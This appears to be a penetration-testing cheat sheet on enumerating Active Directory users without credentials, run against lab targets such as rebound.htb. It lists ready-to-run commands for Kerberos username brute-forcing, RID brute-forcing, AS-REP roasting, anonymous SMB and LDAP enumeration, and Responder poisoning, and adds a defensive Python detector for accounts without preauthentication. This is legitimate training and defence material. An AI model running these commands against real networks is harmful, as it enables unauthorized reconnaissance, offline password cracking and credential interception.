# Enumerating users (No credentials)

## Kerbrute usernames

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

{% embed url="<https://github.com/ropnop/kerbrute/releases/tag/v1.0.3>" %}

```
./kerbrute_linux_amd64 userenum -d rebound.htb --dc 10.10.11.231 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
```

## Getting users with impacket-lookupsid

```
impacket-lookupsid rebound.htb/anon@10.10.11.231
```

## Crackmapexec rid-brute

```
crackmapexec smb rebound.htb -u anonymous -p "" --rid-brute 10000
```

## AS-REP Roasting

AS-REP roasting is an attack against Kerberos for users that don't require preauthentication. During preauthentication, a user enters their password, which is used to encrypt a timestamp; the domain controller then attempts to decrypt it to validate that the right password was used and that the request is not a replay of a previous one. From there, the TGT is issued for the user to use for future authentication. If preauthentication is disabled, an attacker can request authentication data for any such user, and the DC returns an AS-REP containing data encrypted with a key derived from that user's password, which can be brute-forced offline.

```
impacket-GetNPUsers zsm.local/marcus -no-pass -request -format hashcat -outputfile outfile
```
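On the defender's side, the condition described above is visible in two places: the `userAccountControl` bit `0x400000` on the account, and Event ID 4768 records whose `PreAuthType` is `0`. The following is an added example, not part of the original notes; the account list and event records are constructed sample data, and the function names are hypothetical.

```python
from collections import defaultdict

UF_DONT_REQUIRE_PREAUTH = 0x400000  # userAccountControl bit: "do not require Kerberos preauthentication"
RC4_HMAC = 0x17                     # RC4-HMAC etype; weaker than the AES etypes 0x11/0x12

# Constructed sample data (assumption): a directory export and parsed Event ID 4768 fields.
ACCOUNTS = [
    {"sAMAccountName": "alice", "userAccountControl": 0x200},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x200 | 0x10000 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "bob", "userAccountControl": 0x10200},
]
EVENTS_4768 = [
    {"TargetUserName": "alice", "Status": "0x0", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.21"},
    {"TargetUserName": "svc_backup", "Status": "0x0", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.99"},
    {"TargetUserName": "ghost", "Status": "0x6", "PreAuthType": "-",
     "TicketEncryptionType": "0xffffffff", "IpAddress": "::ffff:10.0.0.99"},
]

def accounts_without_preauth(accounts):
    """Names of accounts whose userAccountControl has DONT_REQ_PREAUTH set."""
    return sorted(a["sAMAccountName"] for a in accounts
                  if a["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)

def tgt_issued_without_preauth(events):
    """Group successful AS requests (Status 0x0) answered with no preauthentication by source."""
    hits = defaultdict(list)
    for e in events:
        # Skip failed requests and requests that carried preauthentication data.
        if int(e["Status"], 16) != 0 or e["PreAuthType"] != "0":
            continue
        source = e["IpAddress"].replace("::ffff:", "", 1)  # strip IPv4-mapped prefix
        hits[source].append({
            "user": e["TargetUserName"],
            "rc4": int(e["TicketEncryptionType"], 16) == RC4_HMAC,
        })
    return dict(hits)

if __name__ == "__main__":
    print("Accounts to remediate:", accounts_without_preauth(ACCOUNTS))
    for source, requests in tgt_issued_without_preauth(EVENTS_4768).items():
        print(source, requests)
```

Event ID 4768 is only recorded when the "Audit Kerberos Authentication Service" policy is enabled on the domain controllers.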

## Guest access smb share

First list all shares:

```
smbclient -L //10.10.110.55
```

```
crackmapexec smb 192.168.210.10 -u 'a' -p '' --shares
```

```
enum4linux -a -u "" -p "" 10.10.110.55 && enum4linux -a -u "guest" -p "" 10.10.110.55
```

Connect to share:

```
smbclient //10.10.110.55/sharename
```

## Enumerate LDAP

```
ldapsearch -x -H ldap://10.10.110.55 -s base
```

```
nmap -n -sV --script "ldap* and not brute" -p 389 10.10.110.55
```

## Relay/poisoning

```
sudo responder -I tun0 -v
```

## AD-enumerator.py

Windows Active Directory enumeration tool for Linux, written in Python. Can be used to quickly enumerate popular services on a Windows Domain Controller.

{% embed url="<https://github.com/1ncendium/AD-Enumerator>" %}

```
ad-enumerator.py -t 10.10.10.10 -A
```


